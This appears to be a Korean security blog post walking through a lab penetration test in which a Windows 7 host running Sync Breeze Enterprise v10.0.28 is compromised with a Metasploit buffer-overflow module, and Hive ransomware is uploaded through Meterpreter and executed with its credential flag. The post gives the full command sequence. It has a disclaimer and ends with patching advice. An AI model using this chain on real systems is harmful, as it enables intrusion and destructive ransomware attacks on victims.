[10] Sync Breeze 취약점을 이용한 악성코드 업로드(Hive 랜섬웨어)

- 2022.11.11 -

 

해당 블로그의 내용에는 실제로 해킹을 하는 과정이 언급되어 있습니다.

모의 해킹의 환경은 100% 사용자가 통제가 가능한 상황에서 실습을 진행하였으며

불법적인 해킹이 아닌 모의 해킹으로써 해킹의 목적이 오롯이 교육의 성격에 초점이 맞추어져 있습니다

본 과정을 악용하여 사용하는 2차 피해에 대해서는 행위자가 법적 책임을 질 수 있으며

일어나는 모든 피해에 대해서는 책임지지 않습니다.

 

---

구축 환경

가상 시스템 - 역할 - 운영기반

Kali - Attacker - Debian GNU

Windows - Victim - Windows 7

 

 

IP 목록

Host - IP Address

Kali - 10.10.50.12

Windows 7 - 10.10.0.254

 

 

시나리오 내용

공격자는 여러 호스트들을 탐색하다 Windows 7 환경의 호스트를 발견 하였다.

곧바로 호스트에 대해 포트 스캔을 하니 구 버전으로 실행되고 있는 취약한 파일 전송 프로그램을 식별하였다.

해당 프로그램의 버전으로 검색해보니 취약점이 존재하여 이것을 악용하여 시스템에 침투. 권한을 탈취하고 랜섬웨어를 업로드하여 시스템을 파괴하기로 계획하였다.

먼저 msfconsole을 이용해 해당 프로그램에 대해 BoF공격을 진행하여 시스템의 쉘을 탈취에 성공하였다.

이후 미터프리터로 전환하여 랜섬웨어 파일을 백그라운드로 업로드 하고 명령어를 이용해 랜섬웨어를 실행시킨다.

해당 시스템에서 랜섬웨어를 강제로 실행하고 시스템 전체를 암호화하여 접근을 거부 시킨다.

---

실습 시작

nmap port scan

먼저 NMAP을 이용하여 -sV -sC 옵션을 주어 주어진 IP를 스캔하였다.

54,80,443번 등의 포트가 열려 있는것을 확인 할 수 있고 내부에 Sync Breeze Enterprise라는 프로그램이 실행되고 있는 것을 확인 할 수 있었다. 버전은 v10.0.28 으로 확인 되었다.

 

sudo nmap -sV -sC 10.10.0.254

 

EXPLOIT-DB

exploit-db 에서 해당 프로그램을 검색해보니 동일한 버전으로 올라와있는 취약점을 발견하였다. 

이제 nmap 결과대로 정말로 해당 프로그램이 실행되고 있는지 확인해 보자.

 

Sync Breeze 프로그램 실행

10.10.0.254주소에 포트는 80번 기본 포트이니 그대로 입력해보면 로그인 모습이 나오는 것을 확인했다.

이제 실제로 10.10.0.254:80에 해당 프로그램이 실제로 동작하고 있는것을 확인 했다.

 

bof 확인

칼리에 포함된 공격도구 인 msfconsole을 열고 syncbreeze에 대한 모듈이 있는지 찾아본다.

찾아보니 1번 항목에 해당 프로그램에 대해 버퍼 오버플로우가 

sudo msfconsole
search syncbreeze

 

options settings

모듈 1번을 사용하도록 선택해주고 옵션을 확인 후 필요한 옵션들을 설정해준다.

use 1
show options
set RHOSTS 10.10.0.254

 

공격시작 후 쉘 획득

run 혹은 exploit명령어를 이용해 공격을 시작한다.

그 결과 meterpreter > 라는 항목이 나왔고 그 곳에 shell이라고 입력 하면 해당 시스템에서 쉘을 얻어 올 수 있다.

 

run
shell

 

위치 확인 및 업로드 지정

exit명령어를 이용해 쉘에서 빠져 나온 뒤 업로드 경로를 지정해 준다.

경로는 C드라이브에 있는 temp라는 폴더로 지정하였다.

 

exit
pwd
cd /temp
pwd

 

파일 업로드

그 다음 해당 위치에 랜섬웨어 중 하나인 hive 랜섬웨어를 이용할 것이고 이제 파일을 업로드해 준다.

명령어가 직관적이라 빠르게 적응이 가능하다.

 

upload hive.exe

 

hive.exe

업로드가 완료 되었다면 다시 shell로 해당 시스템에 접근 하여 temp경로로 이동하여 디렉토리 목록을 확인해 보면

나열된 디렉토리에 칼리에서 업로드한 hive.exe가 있는 것을 확인 할 수 있다.

 

shell

##temp경로로 바로 접속이 안되어있다면 경로를 이동해 주기
dir

hive 실행

hive파일을 백그라운드에서 실행해 준다. 플래그 값을 넣어줘야 작동하는데 <ID>:<PASSWORD>로 되어있고 다운로드 받은 곳에서도 별다른 안내가 없어서 난감하던중 그럼 설명이 필요 없을 정도로 단순한게 아닐까 하는 생각에 ID와 PASSWORD를 hive로 넣어 보니 작동 되는것을 확인했다.

 

hive.exe -u hive:hive

 

잠겨버린 파일들

먼저 윈도우 디펜더가 꺼지고 그와동시에 암호화 작업이 진행되는데 백그라운드에서 작업이 되기에 사용자는 눈치채기가 어려운것이 특징이다.

 

암호화가 모두 끝나게 되면 확장자가 무작위로 이상하게 바뀌는것을 확인 할 수 있다.

 

공격자의 메세지

공격자가 의도한 메세지가 담겨 있다 '복호화 하는 법'이라는 이름으로..ㅋㅋ

그리고 복호화 하기 위해 컨택하는 방법으로 onion이라는 사이트로 유도를 하는데 이 사이트는 딥웹사이트로 연결되는 Tor 브라우저를 사용해야 한다. 돈을 줄 바엔.. 그냥 이 악물고 새로 설치하는게 낫다..

 

hive 랜섬웨어는 현재 KISA에서도, 안랩에서도 복호화 도구가 배포되고 있다.

따라서 이미 걸려버렸다고 해도 해당 도구로 충분히 복호화가 가능하니 너무 절망 하지말자.. :)

 

 

---

마  치  며

랜섬웨어는 당해보기만 했지 실제로 내가 타겟의 shell을 얻어내 랜섬웨어를 실행하는 입장이 될 줄 상상도 못했다.

어쨌든 취약점이라는게 생각보다 단순하게도 뚫리지만 또 단순하고 쉬운걸로 비 전문가도 방어할 수 있다는 것을 알았다.

바로 항상 최신상태를 유지해주는 것이다.

올라오는 대부분의 취약점은 대부분 제대로 된 업데이트를 하지 못해 발생하는 취약점 공격에 약했다.